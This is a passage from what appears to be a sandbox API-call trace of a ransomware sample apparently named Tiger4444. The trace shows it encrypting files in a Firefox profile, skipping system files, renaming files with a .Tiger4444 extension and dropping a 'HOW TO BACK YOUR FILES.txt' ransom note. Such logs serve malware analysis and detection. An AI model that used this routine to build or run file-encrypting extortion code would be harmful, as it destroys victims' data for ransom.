returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups" [0051.431] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0051.431] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5a720 | out: hHeap=0xc50000) returned 1 [0051.431] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups" [0051.431] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\" [0051.431] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\.BFC0E91B00AE8A0620D3" [0051.431] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore-backups\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.440] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.443] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.444] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.444] CloseHandle (hObject=0x2ac) returned 1 [0051.445] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups") returned 94 [0051.445] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.445] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6368e07, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb7ea601f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x83ad4fa3, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e48 [0051.445] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.445] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.445] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.445] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.445] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6368e07, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb7ea601f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x83ad4fa3, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.445] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.445] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.445] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.445] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.445] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.445] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83ad4fa3, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83ad4fa3, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83ad4fa3, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.445] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.445] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.446] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd3e77da, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xcd3e77da, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xcd3e77da, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x1f37, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="previous.js", cAlternateFileName="")) returned 1 [0051.446] lstrcmpiW (lpString1="previous.js", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.446] lstrcmpiW (lpString1="previous.js", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.446] lstrcmpiW (lpString1="previous.js", lpString2="Tiger4444.exe") returned -1 [0051.446] lstrcmpiW (lpString1="previous.js", lpString2=".") returned 1 [0051.446] lstrcmpiW (lpString1="previous.js", lpString2="..") returned 1 [0051.446] lstrcmpiW (lpString1="previous.js", lpString2="windows") returned -1 [0051.446] lstrcmpiW (lpString1="previous.js", lpString2="bootmgr") returned 1 [0051.446] lstrcmpiW (lpString1="previous.js", lpString2="pagefile.sys") returned 1 [0051.446] lstrcmpiW (lpString1="previous.js", lpString2="boot") returned 1 [0051.446] lstrcmpiW (lpString1="previous.js", lpString2="ids.txt") returned 1 [0051.446] lstrcmpiW (lpString1="previous.js", lpString2="NTUSER.DAT") returned 1 [0051.446] lstrcpyW (in: lpString1=0x30aeb66, lpString2="previous.js" | out: lpString1="previous.js") returned="previous.js" [0051.446] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\previous.js", dwFileAttributes=0x0) returned 1 [0051.447] lstrlenW (lpString="previous.js") returned 11 [0051.447] lstrlenW (lpString="Tiger4444") returned 9 [0051.447] lstrcmpiW (lpString1="evious.js", lpString2="Tiger4444") returned -1 [0051.447] lstrlenW (lpString=".dll") returned 4 [0051.447] lstrcmpiW (lpString1="s.js", lpString2=".dll") returned 1 [0051.447] lstrlenW (lpString=".lnk") returned 4 [0051.447] lstrcmpiW (lpString1="s.js", lpString2=".lnk") returned 1 [0051.447] lstrlenW (lpString=".ini") returned 4 [0051.447] lstrcmpiW (lpString1="s.js", lpString2=".ini") returned 1 [0051.447] lstrlenW (lpString=".sys") returned 4 [0051.447] lstrcmpiW (lpString1="s.js", lpString2=".sys") returned 1 [0051.447] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\previous.js" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore-backups\\previous.js"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.447] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.448] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14290069322) returned 1 [0051.448] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=7991) returned 1 [0051.448] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0051.448] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71fb0 [0051.448] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2240, lpName=0x0) returned 0x2c8 [0051.449] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2240) returned 0xbe0000 [0051.540] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0051.540] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0051.540] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0051.540] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0051.540] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.541] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0051.541] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.541] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0051.541] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14299391275) returned 1 [0051.541] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0051.541] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0051.541] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.541] CloseHandle (hObject=0x2c8) returned 1 [0051.541] CloseHandle (hObject=0x260) returned 1 [0051.541] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\previous.js.Tiger4444") returned 116 [0051.542] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\previous.js" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore-backups\\previous.js"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\previous.js.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore-backups\\previous.js.tiger4444"), dwFlags=0x1) returned 1 [0051.542] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43824196, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x43824196, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x1407dfe9, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x36df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="upgrade.js-20170824053622", cAlternateFileName="UPGRAD~1.JS-")) returned 1 [0051.542] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.542] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.542] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2="Tiger4444.exe") returned 1 [0051.542] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2=".") returned 1 [0051.542] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2="..") returned 1 [0051.542] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2="windows") returned -1 [0051.542] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2="bootmgr") returned 1 [0051.542] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2="pagefile.sys") returned 1 [0051.542] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2="boot") returned 1 [0051.542] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2="ids.txt") returned 1 [0051.542] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2="NTUSER.DAT") returned 1 [0051.542] lstrcpyW (in: lpString1=0x30aeb66, lpString2="upgrade.js-20170824053622" | out: lpString1="upgrade.js-20170824053622") returned="upgrade.js-20170824053622" [0051.542] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\upgrade.js-20170824053622", dwFileAttributes=0x0) returned 1 [0051.543] lstrlenW (lpString="upgrade.js-20170824053622") returned 25 [0051.543] lstrlenW (lpString="Tiger4444") returned 9 [0051.543] lstrcmpiW (lpString1="824053622", lpString2="Tiger4444") returned -1 [0051.543] lstrlenW (lpString=".dll") returned 4 [0051.543] lstrcmpiW (lpString1="3622", lpString2=".dll") returned 1 [0051.543] lstrlenW (lpString=".lnk") returned 4 [0051.543] lstrcmpiW (lpString1="3622", lpString2=".lnk") returned 1 [0051.543] lstrlenW (lpString=".ini") returned 4 [0051.543] lstrcmpiW (lpString1="3622", lpString2=".ini") returned 1 [0051.543] lstrlenW (lpString=".sys") returned 4 [0051.543] lstrcmpiW (lpString1="3622", lpString2=".sys") returned 1 [0051.543] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\upgrade.js-20170824053622" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore-backups\\upgrade.js-20170824053622"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.544] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.544] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14299679109) returned 1 [0051.544] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=14047) returned 1 [0051.544] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0051.544] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0051.544] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x39e0, lpName=0x0) returned 0x2c8 [0051.546] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x39e0) returned 0xbe0000 [0051.554] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0051.554] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0051.554] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0051.554] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0051.554] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.554] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0051.554] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.554] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0051.554] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14300734900) returned 1 [0051.554] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0051.554] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0051.554] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.555] CloseHandle (hObject=0x2c8) returned 1 [0051.555] CloseHandle (hObject=0x260) returned 1 [0051.555] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\upgrade.js-20170824053622.Tiger4444") returned 130 [0051.555] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\upgrade.js-20170824053622" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore-backups\\upgrade.js-20170824053622"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\upgrade.js-20170824053622.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore-backups\\upgrade.js-20170824053622.tiger4444"), dwFlags=0x1) returned 1 [0051.555] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43824196, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x43824196, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x1407dfe9, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x36df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="upgrade.js-20170824053622", cAlternateFileName="UPGRAD~1.JS-")) returned 0 [0051.555] FindClose (in: hFindFile=0xc72e48 | out: hFindFile=0xc72e48) returned 1 [0051.555] lstrcpyW (in: lpString1=0x30aeb66, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.555] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore-backups\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.556] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0051.556] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.557] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.557] CloseHandle (hObject=0x260) returned 1 [0051.557] CloseHandle (hObject=0x2ac) returned 1 [0051.557] GetCurrentThreadId () returned 0xfa8 [0051.557] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66368 [0051.557] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings" [0051.557] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc61df8 | out: hHeap=0xc50000) returned 1 [0051.557] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66360 | out: hHeap=0xc50000) returned 1 [0051.557] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings" [0051.558] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings\\" [0051.558] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings\\.BFC0E91B00AE8A0620D3" [0051.558] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\saved-telemetry-pings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.558] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.560] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.561] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.562] CloseHandle (hObject=0x2ac) returned 1 [0051.562] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings") returned 95 [0051.562] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.562] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1472dc0f, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb8d8cb9a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x83c065c8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72ec8 [0051.562] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.562] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.562] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.562] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.562] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1472dc0f, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb8d8cb9a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x83c065c8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.562] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.562] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.562] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.562] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.562] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.562] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83c065c8, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83c065c8, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83c065c8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.562] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.563] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.563] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83c065c8, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83c065c8, ftLastAccessTime.dwHighDateTime=0x1d50d44, 